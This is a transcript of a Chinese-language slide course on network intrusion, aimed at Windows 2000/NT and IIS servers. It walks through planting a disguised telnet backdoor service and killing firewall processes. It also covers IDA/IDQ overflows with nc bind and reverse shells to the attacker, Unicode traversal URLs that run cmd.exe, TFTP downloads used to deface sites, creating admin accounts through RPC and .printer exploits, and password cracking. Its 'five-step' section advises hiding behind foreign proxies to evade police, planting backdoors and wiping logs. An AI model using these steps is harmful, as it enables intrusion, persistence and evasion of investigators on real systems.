网络入侵初步.

Presentation on theme: "网络入侵初步."— Presentation transcript:

1 网络入侵初步

2 远程控制计算机 telnet是控制主机的第一手段
入侵者在远程主机上执行命令，可以通过建立IPC$连接，然后使用net time命令查看系统时间，最后使用at 命令建立计划任务，完成远程执行命令。 telnet方式对入侵者而言则会方便得多，入侵一旦与远程主机建立telnet连接，就可以控制本地计算机一样来控制远程计算机。

3 使用telnet登录 telnet host [port] 成功建立telnet连接，除了要求掌握远程计算机上的账号和密码外，还需要远程计算机已经开启telnet服务，并去除NTLM验证。

4 telnet入侵步骤 1、开启远程主机telnet服务 2、去掉NTLM验证 3、telnet连接

5 通过”bat文件”和”计划任务服务”开启远程主机telnet服务
/*start.bat net start telnet /*stop.bat net stop telnet

6 开启远程主机telnet服务后，如果没有去掉NTLM验证，在登录时会失败。

7 解决方法一 1）在本地计算机上建立一个与远程主机上相同的账号 2）通过“开始”—>“程序” —>“附件”找到“命令提示符”，使用右键单击“命令提示符”，然后选择“属性”，打开如下对话框 3）选中对话框中“以其他用户身份运行”

8 4）打开“命令提示符”，输入用户名和密码，单击确定按钮后，得到MS-DOS界面
telnet 便可连接上telnet服务

9 解决方法二 １）使用工具NTLM.exe去除NTLM验证。首先与远程主机建立IPC$连接，然后将NTLM.exe复制到远程主机，最后通过at命令使远程计算机执行NTLM.exe。 ２）在MS-DOS界面上输入 telnet 便可连接上telnet服务

10 telnet杀手锏 opentelnet 开启远程主机telnet服务，并解除NTLM验证
opentelnet \\serverIP <账号> <密码> <telnet端口>

11 telnet高级入侵 采用的工具： Opentelnet aproman: 用来查看进程、杀死进程 instsrv:用来给主机安装服务
aproman –a 显示所有进程 aproman –t pid 杀死指定进程号的进程 instsrv简介:用命令行方式安装、卸载服务的程序，使用方法： instsrv <服务名称> <执行的程序> instsrv <服务名称> REMOVE

12 第一步：用opentelnet打开远程主机telnet服务、修改主机端口、去除NTLM验证
第二步：把所需文件(instsrv.exe,aproman.exe)复制到远程主机 第三步：telnet登录 telnet 第四步：用aproman杀死防火墙进程 第五步：安装更为隐蔽的telnet服务 instsrv syshealth c:\winnt\system32\tlntsvr.exe 一个名为”syshealth”的服务建立成功，从表面上看该服务与远程telnet服务不存在任何关系，但是实际上是入侵者留下的telnet后门服务。即使远程主机上的telnet服务已被停止并禁用，但入侵者仍然能够通过telnet来控制远程主机。

13 远程执行命令工具 psexec \\computer [-u user [-p psswd]] cmd -u 登录用户名 -p 密码 cmd 执行的命令

14 例： psexec \\ u administrator -p hziee123 c:\aproman –a psexec \\ u administrator -p hziee123 cmd.exe

15 远程执行命令方法汇总 通过建立计划任务执行 通过telnet执行 通过psexec工具执行

16 攻击五部曲 一次成功的攻击，都可以归纳成基本的五步骤，但是根据实际情况可以随时调整。归纳起来就是“黑客攻击五部曲” 1、隐藏IP
2、踩点扫描 3、获得系统或管理员权限 4、种植后门 5、在网络中隐身

17 1、隐藏IP 这一步必须做，因为如果自己的入侵的痕迹被发现了，当FBI找上门的时候就一切都晚了。 通常有两种方法实现自己IP的隐藏：
第二种方式是做多级跳板“Sock代理”，这样在入侵的电脑上留下的是代理计算机的IP地址。 比如攻击A国的站点，一般选择离A国很远的B国计算机作为“肉鸡”或者“代理”，这样跨国度的攻击，一般很难被侦破。

18 2、踩点扫描 踩点就是通过各种途径对所要攻击的目标进行多方面的了解（包括任何可得到的蛛丝马迹，但要确保信息的准确），确定攻击的时间和地点。
扫描的目的是利用各种工具在攻击目标的IP地址或地址段的主机上寻找漏洞。扫描分成两种策略：被动式策略和主动式策略。

19 3、获得系统或管理员权限 得到管理员权限的目的是连接到远程计算机，对其进行控制，达到自己攻击目的。获得系统及管理员权限的方法有：
通过系统漏洞获得系统权限 通过管理漏洞获得管理员权限 通过软件漏洞得到系统权限 通过监听获得敏感信息进一步获得相应权限 通过弱口令获得远程管理员的用户密码 通过穷举法获得远程管理员的用户密码 通过攻破与目标机有信任关系另一台机器进而得到目标机的控制权 通过欺骗获得权限以及其他有效的方法。

20 4、种植后门 为了保持长期对自己胜利果实的访问权,在已经攻破的计算机上种植一些供自己访问的后门。

21 5、在网络中隐身 一次成功入侵之后，一般在对方的计算机上已经存储了相关的登录日志，这样就容易被管理员发现。入侵完毕后需要清除登录日志已经其他相关的日志。

22 网络扫描 黑客攻击五部曲中第二步踩点扫描中的扫描， 一般分成两种策略: 一种是主动式策略 另一种是被动式策略。

23 网络扫描概述 被动式策略就是基于主机之上，对系统中不合适的设置，脆弱的口令以及其他同安全规则抵触的对象进行检查。主动式策略是基于网络的，它通过执行一些脚本文件模拟对系统进行攻击的行为并记录系统的反应，从而发现其中的漏洞。 扫描的目的就是利用各种工具对攻击目标的IP地址或地址段的主机查找漏洞。扫描采取模拟攻击的形式对目标可能存在的已知安全漏洞逐项进行检查，目标可以是工作站、服务器、交换机、路由器和数据库应用等。根据扫描结果向扫描者或管理员提供周密可靠的分析报告。

24 系统用户扫描 可以使用工具软件：GetNTUser，该工具可以在Winnt4以及Win2000操作系统上使用，主要功能包括：
（2）自动猜测空密码和与用户名相同的密码。 （3）可以使用指定密码字典猜测密码。 （4）可以使用指定字符来穷举猜测密码。

25 扫描 例如对IP为 的计算机进行扫描，首先将该计算机添加到扫描列表中，选择菜单File下的菜单项“添加主机”，输入目标计算机的IP地址，可以得到对方的用户列表了。点击工具栏上的图标，得到的用户列表。

26 开放端口扫描 得到对方开放了哪些端口也是扫描的重要一步。使用工具软件PortScan可以到得到对方计算机都开放了哪些端口，主界面如图所示。

27 端口扫描 对 的计算机进行端口扫描，在Scan文本框中输入IP地址，点击按钮“START”，开始扫描如图所示。

28 共享目录扫描 通过工具软件Shed来扫描对方主机，得到对方计算机提供了哪些目录共享。工具软件的主界面如图所示。

29 扫描一个IP地址段 该软件可以扫描一个IP地址段的共享信息，这里只扫描IP为 的目录共享情况。在起始IP框和终止IP框中都输入 ，点击按钮“开始”就可以得到对方的共享目录了。

30 漏洞扫描 使用工具软件X-Scan-v2.3 该软件的系统要求为：Windows 9x/NT4/2000。该软件采用多线程方式对指定IP地址段(（或单机）进行安全漏洞检测，支持插件功能，提供了图形界面和命令行两种操作方式 扫描内容包括： 远程操作系统类型及版本 标准端口状态及端口Banner信息 SNMP信息，CGI漏洞，IIS漏洞，RPC漏洞，SSL漏洞 SQL-SERVER、FTP-SERVER、SMTP-SERVER、POP3-SERVER NT-SERVER弱口令用户，NT服务器NETBIOS信息 注册表信息等。

31 主界面 扫描结果保存在/log/目录中，index_*.htm为扫描结果索引文件。

32 扫描参数 可以利用该软件对系统存在的一些漏洞进行扫描，选择菜单栏设置下的菜单项“扫描模块”，扫描模块的设置如图所示。

33 扫描参数 下面需要确定要扫描主机的IP地址或者IP地址段，选择菜单栏设置下的菜单项“扫描参数”

34 漏洞扫描 设置完毕后，进行漏洞扫描，点击工具栏上的图标“开始”，开始对目标主机进行扫描，如图所示。

35 获得系统或管理员权限 介绍目前常用的网络攻击手段： 结合实际，介绍流行的攻击工具的使用。 社会工程学攻击 物理攻击 暴力攻击
利用Unicode漏洞攻击 利用缓冲区溢出漏洞进行攻击等技术。 结合实际，介绍流行的攻击工具的使用。

36 社会工程学攻击 社交工程是使用计谋和假情报去获得密码和其他敏感信息的科学，研究一个站点的策略其中之一就是尽可能多的了解这个组织的个体，因此黑客不断试图寻找更加精妙的方法从他们希望渗透的组织那里获得信息。 举个例子：一组高中学生曾经想要进入一个当地的公司的计算机网络，他们拟定了一个表格，调查看上去显得是无害的个人信息，例如所有秘书和行政人员和他们的配偶、孩子的名字，这些学生说这种简单的调查是他们社会研究工作的一部分。利用这份表格这些学生能够快速的进入系统，因为网络上的大多数人是使用宠物和他们配偶名字作为密码。

37 物理攻击与防范 物理安全是保护一些比较重要的设备不被接触。 物理安全比较难防，因为攻击往往来自能够接触到物理设备的用户。

38 得到管理员密码 用户登录以后，所有的用户信息都存储在系统的一个进程中，这个进程是：“winlogon.exe”，可以利用程序将当前登录用户的密码解码出来，如图所示。

39 得到管理员密码 使用FindPass等工具可以对该进程进行解码，然后将当前用户的密码显示出来。将FindPass.exe拷贝到C盘根目录，执行该程序，将得到当前用户得登录名，如图所示。

40 权限提升 有时候，管理员为了安全，给其他用户建立一个普通用户帐号，认为这样就安全了。
其实不然，用普通用户帐号登录后，可以利用工具GetAdmin.exe将自己加到管理员组或者新建一个具有管理员权限的用户。

41 普通用户建立管理员帐号 利用a1帐户登录系统，在系统中执行程序GetAdmin.exe，程序自动读取所有用户列表，在对话框中点击按钮“New”，在框中输入要新建的管理员组的用户名。

42 普通用户建立管理员帐号 输入一个用户名“a6”，点击按钮“确定”以后，然后点击主窗口的按钮“OK”，出现添加成功的窗口，如图所示。

43 暴力攻击 字典攻击是最常见的一种暴力攻击，如果黑客通过使用传统的暴力攻击方法去获得密码的话，将不得不尝试每种可能的字符和组合。字典攻击则通过使用某种具体的密码来缩小尝试的范围。

44 字典文件 一次字典攻击能否成功，很大因素上决定与字典文件。一个好的字典文件可以高效快速的得到系统的密码。可以根据公司管理员的姓氏以及家人的生日，可以作为字典文件的一部分，公司以及部门的简称一般也可以作为字典文件的一部分，这样可以大大的提高破解效率。 一个字典文件本身就是一个标准的文本文件，其中的每一行就代表一个可能的密码。目前有很多工具软件专门来创建字典文件，下面是一个简单的字典文件。

45 暴力破解操作系统密码 暴力破解操作系统密码 比如使用字典文件，利用工具软件GetNTUser可以将管理员密码破解出来，。

46 设置密码字典 选择菜单栏工具下的菜单项“设置”，设置密码字典为一个文本文件。

47 进行系统破解 利用密码字典中的密码进行系统破解，选择菜单栏工具下的菜单项“字典测试”，程序将按照字典的设置进行逐一的匹配。

48 暴力破解软件密码 目前许多软件都具有加密的功能，比如Office文档、Winzip文档和Winrar文档等等。这些文档密码可以有效的防止文档被他人使用和阅读。但是如果密码位数不够长的话，同样容易被破解。 Office文档暴力破解

49 修改权限密码 在对话框中选择选项卡“安全性”，在打开权限密码和修改权限密码的两个文本框中都输入“315315”，如图所示。

50 输入密码 保存并关闭该文档，然后再打开，就需要输入密码了，如图所示。

51 破解Word文档密码 该密码是三位的，使用工具软件，Advanced Office XP Password Recovery可以快速破解Word文档密码，主界面如图所示。

52 基于漏洞的入侵 任何系统都不是完善的，在设计和实现上总是存在或多或少的缺陷，如果能够找到这些缺陷，并巧妙进行利用，便可绕过系统的认证直接进入系统内部，这就是基于漏洞的入侵，也称为exploit

53 针对X-Scan的漏洞扫描结果进行攻击

54 （1）.ida&.idq漏洞 （2）Unicode目录遍历漏洞 （3）RPC漏洞 （4）.printer漏洞

55 .ida&.idq漏洞 微软IIS默认安装情况下带了一个索引服务器（Index Server，在Windows 2000下为"Index Service"）。默认安装时，IIS支持两种脚本映射：管理脚本（.ida文件）、Internet数据查询脚本（.idq文件）。这两种脚本都由一个ISAPI扩展 - idq.dll来处理和解释。 idq.dll实现上存在一个缓冲区溢出漏洞，远程攻击者可以利用此漏洞通过溢出攻击以“Local System”的权限在主机上执行任意指令。 由于idq.dll在处理某些URL请求时存在一个未经检查的缓冲区，如果攻击者提供一个特殊格式的URL，就可能引发一个缓冲区溢出。通过精心构造发送数据，攻击者可以改变程序执行流程，以“Local System”的权限执行任意代码。

56 受影响系统： Microsoft IIS 4.0 - Microsoft Windows NT 4.0 SP6a - Microsoft Windows NT 4.0 SP6 - Microsoft Windows NT 4.0 SP5 - Microsoft Windows NT 4.0 SP4 - Microsoft Windows NT 4.0 SP3 - Microsoft Windows NT 4.0 SP2 - Microsoft Windows NT 4.0 SP1 - Microsoft Windows NT 4.0 Microsoft IIS 5.0 - Microsoft Windows 2000 Server SP2 - Microsoft Windows 2000 Server SP1 - Microsoft Windows 2000 Server - Microsoft Windows 2000 Professional SP2 - Microsoft Windows 2000 Professional SP1 - Microsoft Windows 2000 Professional - Microsoft Windows 2000 Datacenter Server SP2 - Microsoft Windows 2000 Datacenter Server SP1 - Microsoft Windows 2000 Datacenter Server - Microsoft Windows 2000 Advanced Server SP2 - Microsoft Windows 2000 Advanced Server SP1 - Microsoft Windows 2000 Advanced Server

57 .ida&.idq漏洞利用 .ida入侵实例 1)idahack简介。idahack是基于命令行的溢出工具，当远程服务器溢出后，便会在指定端口得到一个telnet权限。 2)命令格式： idahack <hostip> <hostport> <hosttype> <shellport>

58 入侵思路： 扫描远程服务器、ida溢出、telnet登录、建立账号、退出登录 1)扫描远程服务器，确认远程服务器存在ida漏洞 2) ida溢出,idahack 3) telnet登录,telnet 4)建立用户账号 5)退出登录 exit

59 .idq入侵实例 利用Snake编写的IISIDQ溢出工具，在远程服务器溢出后，有两种登录方式供选择， (一) 在漏洞溢出后， IISIDQ自动打开远程服务器的指定端口并等待连接，这时，采用nc工具远程连接服务器。 (二)在远程服务器溢出以后， IISIDQ 会让远程服务器主去连接入侵者所指定IP地址，这种连接方式使入侵者能够穿透一些网络防火墙。

60 入侵(一) 第一步：IISIDQ溢出工具，该软件适用于各种类型的操作系统，比如对 进行攻击， 的操作系统的Windows 2000，没有安装补丁程序，攻击完毕后，开辟一个813端口，并在对方计算机上执行cmd.exe命令。

61 点击按钮“IDQ溢出”，出现攻击成功的提示框。

62 第二步：这个时候，813端口已经开放，利用工具软件nc.exe连接到该端口，使用的语法是：nc.exe 192.168.93.1 813
1)主动连接到外部：nc host port 2)监听以等待外部连接：nc –l –p port 第三步：建立后门账号 第四步：使用exit断开连接

63 入侵(二) 第一步：使用nc.exe在本地打开端口等待连接。

64 第二步：本地的IP地址是192. 168. 93. 3，要攻击的计算机的IP地址是192. 168. 93
第二步：本地的IP地址是 ，要攻击的计算机的IP地址是 ，选择溢出选项中的第一项，设置IP为本地IP地址，端口是813，

65 设置好以后，点击按钮“IDQ溢出”,查看nc命令的DOS框，nc连接上远程主机了。
第三步：建立后门账号 第四步：使用exit断开连接

66 .printer 漏洞 微软Win 2K IIS 5的打印ISAPI扩展接口建立了.printer扩展名到msw3prt.dll的映射关系，缺省情况下该映射存在。当远程用户提交对.printer的URL请求时，IIS 5调用msw3prt.dll解释该请求。由于msw3prt.dll缺乏足够的缓冲区边界检查，远程用户可以提交一个精心构造的针对.printer的URL请求，在msw3prt.dll中发生典型的缓冲区溢出，潜在允许执行任意代码。溢出发生后，WEB服务停止响应，Win 2K可以检查到WEB服务停止响应，从而自动重启它，因此系统管理员很难意识到发生过攻击。 受影响系统： Microsoft Windows 2000 Server Microsoft Windows 2000 Datacenter Server Microsoft Windows 2000 Advanced Server

67 .printer 漏洞攻击 使用工具软件：cniis.exe，使用的语法格式是：“cniis ”，第一个参数是目标的IP地址，第二参数是目标操作系统的补丁号，因为 没有打补丁，这里就是0。执行完后，将会在目标主机上建立一个用户名和密码都是hax的用户.

68 Unicode漏洞 微软IIS 4.0和IIS 5.0在Unicode字符解码的实现中存在一个安全漏洞，导致用户可以远程通过IIS执行任意命令。当IIS打开文件时，如果该文件名包含unicode字符，它会对其进行解码，从而利用扩展UNICODE字符取代“/”和“\”而能利用“../”遍历远程主机目录。这样一来，入侵者就可以通过该方法操作该服务器上的磁盘文件，可以新建、执行、下载、甚至删除磁盘

69 实现unicode编码入侵的关键是构造”/”和”\”字符让远程服务器执行，可以通过下面编码来构造”/”和”\”字符。
%c1%1c -> / %c0%2f -> \

70 在IE的地址栏中输入http://192. 168. 93. 1/scripts/. %c1%1c. /winnt/system32/cmd
cmd.exe?/c+ 打开远程服务器中的cmd.exe dir+c:\ 是入侵者要执行的命令 利用unicode漏洞，入侵者能把IE变成了远程执行命令的控制台。

71 Unicode漏洞的检测方法 在Windows的目录结构中，可以使用两个点和一个斜线“../”来访问上一级目录，在浏览器中利用“scripts/../../”可以访问到系统盘根目录，访问“scripts/../../winnt/system32”就访问到系统的系统目录了，在system32目录下包含许多重要的系统文件，比如cmd.exe文件，可以利用该文件新建用户，删除文件等操作。 浏览器地址栏中禁用符号“../”，但是可以使用符号“/”的Unicode的编码。比如 “/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir”中的“%c0%2f”就是“/”的Unicode编码。这条语句是执行dir命令列出目录结构。

72 Unicode漏洞 此漏洞从中文IIS4.0+SP6开始，还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1，台湾繁体中文也同样存在这样的漏洞。在NT4中/编码为“%c1%9c”或者“%c1%9c”，WIN2000英文版是“%c0%af”。 但从国外某些站点得来的资料显示，还有以下的编码可以实现对该漏洞的检测，该编码存在于日文版、韩文版等操作系统。 %c1%pc %c0%9v %c0%qf %c1%8s %e0%80%af

73 利用Unicode漏洞读取系统盘目录

74 拷贝文件 为了是使用方便，利用语句将cmd.exe文件拷贝到scripts目录，并改名为c.exe，使用的语句是：

75 查看C盘的目录 以后使用cmd.exe命令就方便了，比如查看C盘的目录，使用的语句就可以简化为：

76 利用Unicode漏洞更改主页 第一步：确定对方网站的根路径在“C:\Inetpub\wwwroot”（系统默认）下，可以删除该路径下的文件“default.html”来删除主页，这里的“default.html”文件是IIS的默认启动页面。 使用的语句是：

77 利用Unicode漏洞更改主页

78 利用Unicode漏洞更改主页 第二步：利用本机TFTP服务器，让远程主机下载更改后的主页。
1）首先在本地计算机上搭建一个TFTP服务器，普通文件传输协议TFTP（Text File Transmission Protocol）一般用来传输单个文件。 2）使用工具软件tftpd32.exe建立TFTP服务器。 3）使用tftp命令把本机上的主页传到远程主机上 “

79 tftp命令是windows自带的命令，专门用来从tftp服务器上传和下载文件，使用方法如下：
tftp [-i] host [GET|PUT] source [dest] -i 二进制文件传输 GET 下载文件 PUT 上传文件

80 利用Unicode漏洞入侵系统 在地址栏上执行命令，用户的权限比较低，像net等系统管理指令不能执行。
一般情况下，用户通过IE运行远程服务器的文件一般是以IUSR_machinename帐号方式运行的，所以得到的权限较低，但调用下面文件时，将得到系统管理员权限，所以可以制作一个后门程序，这个后门程序用下面文件名。 1 idq.dll， httpext.dll，3 httpodbc.dll， ssinc.dll 5 msw3prt.dll， author.dll， 7 admin.dll， shtml.dll 9 sspifilt.dll， compfilt.dll， 11 pwsdata.dll 12 md5filt.dll， fpexedll.dll

81 第二步：在本机上建立TFTP服务器，通过该服务器向对方传递idq.dll文件。在浏览器中执行命令：
上传完毕后可以查看一下scripts目录，是否真的上传成功了。 第三步：利用连接工具 ispc.exe ，执行命令 ispc.exe /scripts/idq.dll”，连接成功后就直接进入了对方的DOS命令行下，而且具有管理员权限， 第四步：添加用户

82 RPC漏洞溢出 Remote Procedure Call (RPC)调用是WINDOWS使用的一个协议，提供进程间交互通信，RPC在处理通过TCP/IP进行信息交换过程中存在漏洞，问题是由于不正确处理畸形消息造成。 RPC漏洞影响使用RPC的DCOM接口，攻击者如果成功利用此漏洞，可以以系统用户权限执行任意代码。 受影响系统 Microsoft Windows NT 4.0 Microsoft Windows 2000 Microsoft Windows XP

83 利用RPC漏洞建立超级用户 利用工具scanms.exe文件检测RPC漏洞，该工具是ISS安全公司2003年7月30日发布的，运行在命令行下用来检测指定IP地址范围内机器是否已经安装了“DCOM RPC 接口远程缓冲区溢出漏洞（ MS03-026）”补丁程序。如果没有安装补丁程序，该IP地址就会显示出“[VULN]”。 scanms 使用方法： scanms <ipaddr> <ipaddr-ipaddr>

84 检查RPC溢出漏洞

85 RPC漏洞攻击 利用工具rpcdcom和openrpcss
1）使用rpcdcom对远程主机进行攻击。攻击的结果将在对方计算机上建立一个具有管理员权限的用户，新建用户的用户名和密码都是qing10。使用了rpcdcom攻击后，会终止对方的RPC服务。 RPC服务停止操作系统将有许多功能不能使用，非常容易被管理员发现。 2）使用工具软件openrpcss.exe来给对方重启RPC服务。 rpcdcom使用方法:rpcdcom serverip openrpcss使用方法：openrpcss \\serverip

86 攻击的全过程

87 本章习题 【1】、对一台操作系统是Windows 2000 Server或者是Windows 2000 Advanced Server的计算机进行扫描，并写扫描报告，要求记录对方用户列表、共享的目录和已经存在的漏洞。（上机完成） 【2】、利用Unicode漏洞入侵对方计算机，更改Administrator密码为123456。（上机完成） 【3】、利用三种不同的方法，入侵对方系统，并写入侵总结报告。（上机完成）